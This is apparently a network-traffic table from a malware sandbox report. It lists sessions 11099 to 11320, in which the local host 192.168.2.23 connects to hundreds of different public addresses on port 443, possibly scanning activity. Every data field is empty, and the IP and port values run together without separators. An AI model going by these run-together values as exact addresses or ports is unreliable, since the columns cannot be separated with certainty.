                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11099192.168.2.2353504201.223.0.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11100192.168.2.2336292118.101.3.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11101192.168.2.234541045.30.74.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11102192.168.2.2336038105.115.63.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11103192.168.2.234693246.70.228.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11104192.168.2.2352570173.12.195.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11105192.168.2.2336486141.151.156.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11106192.168.2.234259848.171.11.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11107192.168.2.235983287.190.87.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11108192.168.2.234943897.18.66.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11109192.168.2.2352942136.186.94.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11110192.168.2.235446069.76.242.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11111192.168.2.2337212141.119.164.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11112192.168.2.2350236133.252.65.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11113192.168.2.2342488201.199.39.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11114192.168.2.2344784162.32.106.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11115192.168.2.2335992125.97.227.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11116192.168.2.2355722213.243.84.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11117192.168.2.2348204138.230.165.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11118192.168.2.233515291.108.156.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11119192.168.2.2345498202.168.160.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11120192.168.2.2353542156.129.45.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11121192.168.2.2344704106.46.226.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11122192.168.2.235953894.136.145.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11123192.168.2.2333518161.4.154.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11124192.168.2.2358200189.51.89.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11125192.168.2.235234493.56.226.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11126192.168.2.236050654.135.66.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11127192.168.2.2350508118.24.37.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11128192.168.2.2344682170.215.227.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11129192.168.2.2351974147.242.140.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11130192.168.2.236007012.21.5.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11131192.168.2.234502284.85.19.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11132192.168.2.2359426170.85.31.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11133192.168.2.2349738174.130.126.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11134192.168.2.233793271.14.70.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11135192.168.2.2346834218.21.45.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11136192.168.2.2358568152.85.88.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11137192.168.2.234129857.58.87.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11138192.168.2.2352024113.115.151.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11139192.168.2.2354276221.45.114.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11140192.168.2.233948295.210.145.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11141192.168.2.233314824.161.195.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11142192.168.2.2359758140.142.113.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11143192.168.2.2339246120.227.78.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11144192.168.2.2335562176.140.83.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11145192.168.2.235873090.69.247.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11146192.168.2.234050059.40.93.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11147192.168.2.235427492.60.180.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11148192.168.2.2346792194.93.207.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11149192.168.2.2342112203.186.131.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11150192.168.2.23334462.228.151.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11151192.168.2.235258280.165.231.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11152192.168.2.2352964153.180.214.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11153192.168.2.2354102164.138.228.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11154192.168.2.2335028193.141.101.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11155192.168.2.2342340122.196.144.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11156192.168.2.2350690189.107.162.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11157192.168.2.2350468216.112.185.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11158192.168.2.2338470213.93.126.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11159192.168.2.2339722213.57.182.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11160192.168.2.235810453.120.229.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11161192.168.2.2334338108.28.18.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11162192.168.2.235185043.7.109.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11163192.168.2.2334194202.131.218.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11164192.168.2.233797644.61.225.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11165192.168.2.235347060.118.7.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11166192.168.2.2348984160.130.81.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11167192.168.2.234656071.235.20.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11168192.168.2.23375944.118.166.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11169192.168.2.235251862.111.9.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11170192.168.2.235285417.118.241.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11171192.168.2.236062823.107.77.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11172192.168.2.2342210117.115.145.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11173192.168.2.2354956193.210.54.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11174192.168.2.2339356217.163.22.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11175192.168.2.235808852.176.146.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11176192.168.2.2352726163.115.239.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11177192.168.2.233503248.252.146.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11178192.168.2.2346036151.128.100.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11179192.168.2.234777843.62.234.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11180192.168.2.2337190191.133.29.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11181192.168.2.2355062163.41.55.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11182192.168.2.234608036.110.215.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11183192.168.2.2348994133.196.119.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11184192.168.2.234063450.108.143.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11185192.168.2.2352788189.196.155.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11186192.168.2.234472025.125.202.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11187192.168.2.235486293.160.43.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11188192.168.2.2346006141.98.76.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11189192.168.2.2354566200.161.216.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11190192.168.2.2348404119.240.180.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11191192.168.2.2357748196.157.202.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11192192.168.2.2334598194.87.251.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11193192.168.2.2333322119.203.198.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11194192.168.2.233647673.52.56.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11195192.168.2.2356780219.35.96.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11196192.168.2.2351392138.111.51.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11197192.168.2.2340740170.62.153.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11198192.168.2.2337290209.233.6.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11199192.168.2.2354758136.147.231.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11200192.168.2.2358428178.141.187.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11201192.168.2.2338768133.51.255.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11202192.168.2.2349890126.20.137.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11203192.168.2.234256032.214.92.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11204192.168.2.234760081.61.126.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11205192.168.2.234577871.151.190.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11206192.168.2.2344884124.44.240.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11207192.168.2.2343420199.205.1.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11208192.168.2.2336290109.126.15.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11209192.168.2.2353450165.166.155.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11210192.168.2.233507814.35.179.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11211192.168.2.2353558120.39.67.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11212192.168.2.235979238.170.210.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11213192.168.2.2353960205.82.34.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11214192.168.2.2357506106.34.6.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11215192.168.2.2333378110.217.224.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11216192.168.2.2350576212.101.183.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11217192.168.2.233424685.231.96.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11218192.168.2.234866417.145.167.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11219192.168.2.2351280213.40.142.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11220192.168.2.2338196216.213.237.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11221192.168.2.2337612197.26.24.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11222192.168.2.235073060.139.35.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11223192.168.2.2356426131.226.175.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11224192.168.2.2341240147.201.121.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11225192.168.2.2358594207.255.90.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11226192.168.2.235138841.43.253.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11227192.168.2.234480268.111.247.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11228192.168.2.2336834221.215.245.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11229192.168.2.2359754133.179.50.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11230192.168.2.2359350144.185.115.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11231192.168.2.2333528130.163.97.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11232192.168.2.2348710104.147.65.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11233192.168.2.23560965.83.122.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11234192.168.2.2352308201.21.128.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11235192.168.2.2340144155.210.22.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11236192.168.2.2336116122.42.180.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11237192.168.2.2346868183.198.108.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11238192.168.2.2348980119.63.167.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11239192.168.2.2335832199.241.56.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11240192.168.2.2334042199.18.67.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11241192.168.2.235435093.86.75.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11242192.168.2.2349874116.55.32.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11243192.168.2.2335992140.11.237.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11244192.168.2.23333661.38.148.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11245192.168.2.2348760104.13.113.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11246192.168.2.234740014.189.142.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11247192.168.2.2356276167.46.72.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11248192.168.2.2357788137.52.190.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11249192.168.2.2342362135.8.137.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11250192.168.2.2343922150.156.179.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11251192.168.2.2343388202.226.15.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11252192.168.2.2352772190.138.19.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11253192.168.2.2334722172.156.133.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11254192.168.2.2355124187.213.16.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11255192.168.2.2333454154.237.26.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11256192.168.2.234815835.146.188.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11257192.168.2.2344718110.125.165.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11258192.168.2.2356716143.235.118.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11259192.168.2.2355812185.89.207.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11260192.168.2.235784241.68.92.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11261192.168.2.2336980147.184.144.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11262192.168.2.2349924140.147.135.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11263192.168.2.2342544183.15.210.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11264192.168.2.233627296.57.130.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11265192.168.2.2341964205.172.31.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11266192.168.2.2345176132.32.219.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11267192.168.2.235076894.206.142.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11268192.168.2.235704698.79.243.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11269192.168.2.2355068211.26.64.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11270192.168.2.235890264.152.251.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11271192.168.2.235110269.104.1.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11272192.168.2.2354204117.126.206.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11273192.168.2.2347636194.224.112.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11274192.168.2.2334594210.135.139.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11275192.168.2.2341582206.64.186.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11276192.168.2.2346114200.67.48.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11277192.168.2.2341170128.233.240.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11278192.168.2.2346494210.119.79.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11279192.168.2.2342674173.33.247.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11280192.168.2.2351966157.61.204.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11281192.168.2.2349450100.165.28.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11282192.168.2.2334456181.170.18.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11283192.168.2.2346658161.25.111.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11284192.168.2.235001831.101.197.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11285192.168.2.2360632109.254.243.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11286192.168.2.2341846180.55.150.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11287192.168.2.235600078.167.9.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11288192.168.2.2339632141.53.118.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11289192.168.2.233579832.135.15.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11290192.168.2.235667665.190.114.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11291192.168.2.235556046.131.204.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11292192.168.2.235132246.78.214.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11293192.168.2.2344616122.214.181.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11294192.168.2.2341856115.162.244.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11295192.168.2.235029057.222.56.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11296192.168.2.235158218.190.211.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11297192.168.2.2356068202.220.190.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11298192.168.2.233901048.228.86.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11299192.168.2.2356250133.67.171.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11300192.168.2.2345200133.123.19.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11301192.168.2.2355600196.77.157.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11302192.168.2.2343756184.187.208.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11303192.168.2.2336252175.117.12.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11304192.168.2.234289060.123.249.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11305192.168.2.234796047.160.107.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11306192.168.2.2354832153.186.181.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11307192.168.2.234868624.181.161.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11308192.168.2.235528851.77.89.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11309192.168.2.235156074.81.177.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11310192.168.2.2340368130.135.4.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11311192.168.2.234707442.163.201.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11312192.168.2.234998871.161.172.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11313192.168.2.234947473.139.241.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11314192.168.2.2360704152.99.122.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11315192.168.2.2359028134.203.239.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11316192.168.2.235909267.182.94.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11317192.168.2.2341304116.66.225.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11318192.168.2.235824040.6.68.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11319192.168.2.233714876.180.159.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11320192.168.2.234478647.179.50.156443
